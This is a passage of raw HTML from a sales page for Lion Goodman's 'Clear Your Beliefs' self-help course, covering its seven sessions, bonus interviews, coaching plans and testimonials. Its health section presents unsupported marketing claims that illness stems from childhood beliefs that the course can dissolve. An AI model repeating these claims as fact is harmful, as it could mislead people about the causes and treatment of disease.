will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n&nbsp;\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n&nbsp;\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n&nbsp;\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n&nbsp;\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n&nbsp;\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n&nbsp;\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n&nbsp;\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n&nbsp;\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n&nbsp;\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n&nbsp;\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your 